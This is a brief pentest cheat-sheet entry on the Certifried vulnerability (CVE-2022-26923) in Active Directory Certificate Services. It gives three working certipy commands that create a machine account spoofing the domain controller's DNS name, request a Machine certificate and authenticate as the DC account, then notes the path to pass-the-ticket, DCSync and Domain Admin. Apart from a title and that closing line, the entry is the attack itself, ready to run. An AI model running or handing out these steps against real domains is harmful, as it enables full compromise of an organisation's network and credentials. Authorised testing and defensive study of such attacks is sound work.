Certifried CVE-2022-26923 (Need ADCS to work)

Exploitation

• certipy account create -u USER@DOMAIN -p 'PASSWORD' -user 'CERTIFRIEDPC' -pass 'CERTIFRIEDPASS' -dns 'FQDN_DC'

• certipy req -u 'CERTIFRIEDPC$'@DOMAIN -p 'CERTIFREIDPASS' -target CA_FQDN -ca CA_NAME -template Machine

• certipy auth -pfx PFX_FILE -username 'DC$' -domain DOMAIN -dc-ip DC_IP

With this attack, you Pass the Ticket, then DCSync to Domain Admin